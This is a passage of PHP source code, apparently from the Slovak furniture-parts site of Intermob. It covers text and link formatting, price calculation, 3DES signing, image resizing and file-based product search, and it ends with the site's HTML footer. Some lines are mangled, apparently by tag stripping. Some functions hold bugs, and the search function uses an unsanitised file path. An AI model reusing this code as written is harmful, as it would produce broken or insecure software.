"ľ", $text); $text = trim(stripslashes(strip_tags($text))); $text = Str_Replace ("'", "˝", $text); $text = Str_Replace (" ,", "Ç", $text); $text = Str_Replace (",", "Ç", $text); $text = Str_Replace ("Ç", ", ", $text); $text = Str_Replace (" ", " ", $text); $a = strpos(StrToLower(" ".$text), "http://"); if ($a == 0) $a = strpos(StrToLower(" ".$text), "www."); if ($a != 0) { $slova = Explode (" ", substr(" ".$text, $a)); $link = $slova[0]; if((substr($link, -1) == ".")||(substr($link, -1) == ",")) $link = substr($link, 0, StrLen($link)-1); $text = Str_Replace($link, "Ç", $text); $link = StrToLower($link); $link = Str_Replace("http://", "", $link); $link = "".$link.""; $text = Str_Replace("Ç", $link, $text); } return $text; } function addmail($text) { $original_text = $text; $text = StrTr($text, ";,:<>", " "); $text = Str_Replace(chr(13), " ", $text); $slovo = Explode (" ", $text); $n = count($slovo); for ($i=0; $i<$n; $i++) { if (strpos($slovo[$i], "@")) $original_text = Str_Replace($slovo[$i], ''.$slovo[$i].'', $original_text); } return $original_text; } function getID() { global $adminlink; $id_subor = $adminlink."data/id.txt"; if (File_Exists($id_subor)) { $file=FOpen($id_subor, "r+"); $pocitadlo=FGetS($file,10); $file=FOpen($id_subor, "w"); FputS($file,($pocitadlo+1)); FClose($file); } return substr($pocitadlo,-5); } function kod_datumu($rj) { switch(Date("n")): case '1': $m=0; break; case '2': $m=31; break; case '3': $m=59; break; case '4': $m=90; break; case '5': $m=120; break; case '6': $m=151; break; case '7': $m=181; break; case '8': $m=212; break; case '9': $m=243; break; case '10': $m=273; break; case '11': $m=304; break; case '12': $m=334; break; endswitch; $kod_dna = Date("j") + $m + ((Date("Y")-2007)*365); $kod_hodiny = $kod_dna*24 + Date("H") + Date("H") + (Date("i")/60); if ($rj == "den") return $kod_dna; else return $kod_hodiny; } function cena($cena, $zlava, $mena = "") { global $zaokruhlovat_na, $f_dual, $kurz; $cena = round($cena*(100-$zlava)/pow(10, 2-$zaokruhlovat_na))/pow(10, $zaokruhlovat_na); if ($mena == "") return $cena; else { $pom = Explode (".", $cena); if (strlen($pom[1]) == 1) $pom[1] = $pom[1]."0"; if ($pom[0]*1 >= 1000) $pom[0] = substr($pom[0],0,-3).".".substr($pom[0],-3); if ($pom[0] >= 1000) $pom[0] = substr($pom[0],0,-7).".".substr($pom[0],-7); if ($pom[1]*1 == 0) $pom[1] = "-"; $cena_txt = $pom[0].",".$pom[1].$mena; if ($f_dual == 1) { $cena = round(($cena*$kurz*100)/pow(10, 2-2))/pow(10, 2); $pom = Explode (".", $cena); if (strlen($pom[1]) == 1) $pom[1] = $pom[1]."0"; if ($pom[0]*1 >= 1000) $pom[0] = substr($pom[0],0,-3).".".substr($pom[0],-3); if ($pom[0] >= 1000) $pom[0] = substr($pom[0],0,-7).".".substr($pom[0],-7); if ($pom[1]*1 == 0) $pom[1] = "-"; $cena_txt .= " | ".$pom[0].",".$pom[1]." Sk"; } return $cena_txt; } } function get_sign($input, $key) { $encrypted_text = mcrypt_ecb(MCRYPT_3DES, $key, substr(sha1($input),0,8), MCRYPT_ENCRYPT,substr(sha1($input),0,8)); $sign = StrToUpper(bin2hex($encrypted_text)); return $sign; } function pict_velkost($nazov, $poradovnik) { global $pict_adresar, $img_sirka, $img_vyska, $img_vsirka, $img_vvyska, $img_nsirka, $img_nvyska, $img_sirka_special, $img_vyska_special, $nahladov_v_riadku, $f_detail, $adminlink; if ($poradovnik == "0") $poradovnik = ""; else if ($poradovnik == "special") {$img_sirka = $img_sirka_special; $img_vyska = $img_vyska_special; $poradovnik = "";} else $poradovnik = "_".$poradovnik; $pom = imagecreatefromjpeg($adminlink.$pict_adresar."/pom.jpg"); $pom_sirka = imagesx($pom); $pom_vyska = imagesy($pom); $pomer = $pom_sirka/$pom_vyska; // Obrázok v náhľade $cesta = $adminlink.$pict_adresar."/".$nazov.$poradovnik.".jpg"; if ($poradovnik == "") { $max_sirka = $img_sirka; $max_vyska = $img_vyska; } else { $max_sirka = ($img_nsirka-(7*($nahladov_v_riadku-1)))/$nahladov_v_riadku; $max_vyska = $max_sirka/($img_nsirka/$img_nvyska); } $sirka = round($max_sirka); $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = round($max_vyska); $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila.

Pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému opätovne.
"); ImageCopyreSampled($new_obr,$pom,0,0,0,0,$sirka,$vyska,$pom_sirka,$pom_vyska); ImageJpeg($new_obr,$cesta); ImageDestroy($new_obr); // Obrázok v detaile produktu if ($f_detail == 1) { $cesta = $adminlink.$pict_adresar."/".$nazov.$poradovnik."n.jpg"; $max_sirka = $img_nsirka; $max_vyska = $img_nvyska; $sirka = round($max_sirka); $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = round($max_vyska); $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila.
Pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému opätovne.
"); ImageCopyreSampled($new_obr,$pom,0,0,0,0,$sirka,$vyska,$pom_sirka,$pom_vyska); ImageJpeg($new_obr,$cesta); ImageDestroy($new_obr); } // Veľký obrázok $cesta = $adminlink.$pict_adresar."/".$nazov.$poradovnik."v.jpg"; if ($zakazat_zvacsenie == 1) { if ($pom_sirka<$img_vsirka) $max_sirka = $pom_sirka; else $max_sirka = $img_vsirka; if ($pom_vyska<$img_vvyska) $max_vyska = $pom_vyska; else $max_vyska = $img_vvyska; } else { $max_sirka = $img_vsirka; $max_vyska = $img_vvyska; } $sirka = round($max_sirka); $vyska = round($max_sirka/$pomer); if ($vyska>$max_vyska) {$vyska = round($max_vyska); $sirka = round($max_vyska*$pomer);} $new_obr = ImageCreateTruecolor($sirka,$vyska) or die("Úprava rozmerov obrázku sa nepodarila.
Pravdepodobne je obrázok príliš veľký.
Skúste zmenšiť jeho rozmer a vložte ho do systému opätovne.
"); ImageCopyreSampled($new_obr,$pom,0,0,0,0,$sirka,$vyska,$pom_sirka,$pom_vyska); ImageJpeg($new_obr,$cesta); ImageDestroy($new_obr); ImageDestroy($pom); } function vyhladaj($kat, $vyraz) { $subor = "data/$kat.txt"; $vyraz = StrToLower($vyraz); $fp = FOpen ($subor, "r"); $data = FRead ($fp, FileSize($subor)); $tovar = Explode("|||", $data); $n=count($tovar)-1; for ($i=1; $i<=$n; $i++) {if (StrPos(" ".StrToLower($tovar[$i]),$vyraz)) $vyhladane_data = $vyhladane_data."|||".$kat."¤¤¤".$i."¤¤¤".$tovar[$i];} FClose ($fp); return $vyhladane_data; } function tree_otvor($kat,$posun) { global $tree_zoznam; $act_uroven = Explode (" - ", pridelnazov($kat)); $poc_urovni = count($act_uroven)-1; $pozicia = 0; for ($p=0; $p 0) echo ''; if ($posun == -100) echo $p."
"; $pozicia++; } if ($pozicia >= $poc_urovni) break; } } ?> INTERMOB - dvierka a fólie pre nábytok


    O firme
    Aktuality
    Na stiahnutie
    Kontakt
O firmeKuchyneInteriéryKontakt
(c) 2011 Intermob, s.r.o. | Všetky práva vyhradené | Web-design & programming: www.istudio.sk